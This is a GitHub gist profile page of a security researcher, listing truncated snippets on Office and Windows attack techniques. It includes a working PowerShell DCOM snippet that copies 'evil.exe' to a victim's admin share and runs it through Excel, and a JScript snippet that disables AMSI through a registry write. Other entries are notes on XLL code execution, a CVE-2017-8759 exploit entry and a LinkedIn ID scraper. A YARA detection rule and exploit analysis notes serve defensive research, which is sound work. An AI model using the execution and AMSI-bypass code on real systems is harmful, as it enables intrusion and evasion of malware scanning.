Skip to content

Instantly share code, notes, and snippets.

View rxwx's full-sized avatar

Rich Warren rxwx

542 followers · 1 following
View GitHub Profile
@rxwx
rxwx / findhosts.py
Created June 13, 2017 13:19
#!/usr/bin/env python
import OpenSSL
from iptools import IpRangeList
import ssl
import socket
import sys
import argparse
def do_scan(range, csv=False):
@rxwx
rxwx / Readme.md
Last active May 4, 2023 14:19

Notes

An XLL file is basically a DLL with some special features to make it work with Excel.

See - https://msdn.microsoft.com/en-us/library/office/bb687911.aspx

By creating a DLL which exports xlAutoOpen, and then renaming the compiled DLL to .xll, we can execute our code in DllMain when the file is loaded by Excel.

The attached .xll file will open with Excel (by default) when double-clicked. The user will then be presented with a warning. If the warning is clicked through, then our code is executed.

@rxwx
rxwx / cDefaultLaunchAttachmentPerms.md
Last active June 8, 2022 11:06
Attachment permissions in each version of Adobe Reader 11.0.10 - 11.0.x
@rxwx
rxwx / get-linkedin-id.js
Created August 25, 2017 15:43
JS to grab a linkedin memberID from a profile
// paste this in the chrome console and call findMemberID() when on a profile page
// need to be logged in
function decodeHtml(html) {
var txt = document.createElement("textarea");
txt.innerHTML = html;
return txt.value;
}
function httpGet(){
@rxwx
rxwx / foxprow.ps1
Last active September 14, 2017 15:06
DCOM binary planting via Excel.Application.ActivateMicrosoftApp
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "192.168.1.111"))
# Windows 10 specific, but searches PATH so ..
copy C:\payloads\evil.exe \\victimip\c$\Users\bob\AppData\Local\Microsoft\WindowsApps\FOXPROW.EXE
$excel.ActivateMicrosoftApp("5")
# excel executes your binary :)
@rxwx
rxwx / exploit.pptx
Last active September 13, 2017 08:25
CVE-2017-8759
@rxwx
rxwx / CVE_2017_8759_CRLF.yara
Created September 17, 2017 13:44
Yara rule to detect attempts to exploit .NET CLRF injection in a WSDL file (aka CVE-2017-8759)
rule CVE_2017_8759_CRLF {
meta:
description = "Detects attempts to exploit CVE-2017-8759 CRLF injection in WSDL file"
author = "Rich Warren @buffaloverflow"
reference = "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html"
date = "2017-09-17"
strings:
$s1 = /<soap:address location=\";\r?\n/ ascii wide nocase
condition:
$s1
@rxwx
rxwx / notes.md
Last active March 22, 2024 02:04
Notes on new Equation Editor Exploit, CVE-2018-0802 variant

New Equation Editor Exploit Variant

On 19/03/18, a large number of RTF samples started triggering one of my "suspicious" RTF rules. Looking at the samples, they all appeared to have around 2-4 detections, which seemed curious. This was confirmed by Mitja Kolsek to be a new variant of CVE-2018-0802, which is already covered by 0patch, and patched by Microsoft in January 2018. However, the technique is not unique to CVE-2018-0802 and can be seen used to exploit CVE-2017-11882 aswell.

This was also seen by Shiao Qu. There is a [blog post](https://www.drop

@rxwx
rxwx / ziptool.ps1
Created May 4, 2018 17:47
File Zip in native PowerShell with .NET 3.0
<#
.SYNOPSIS
Author: Rich Warren
Based on original c# code by Jon Galloway:
https://weblogs.asp.net/jongalloway/creating-zip-archives-in-net-without-an-external-library-like-sharpziplib
.DESCRIPTION
Tool for creating a Zip file in native Powershell with .NET 3.0 only.
@rxwx
rxwx / bypass.js
Created August 16, 2018 17:14
AMSIEnable Bypass in JScript
var sh = new ActiveXObject('WScript.Shell');
var key = "HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable";
try{
var AmsiEnable = sh.RegRead(key);
if(AmsiEnable!=0){
throw new Error(1, '');
}
}catch(e){
sh.RegWrite(key, 0, "REG_DWORD"); // neuter AMSI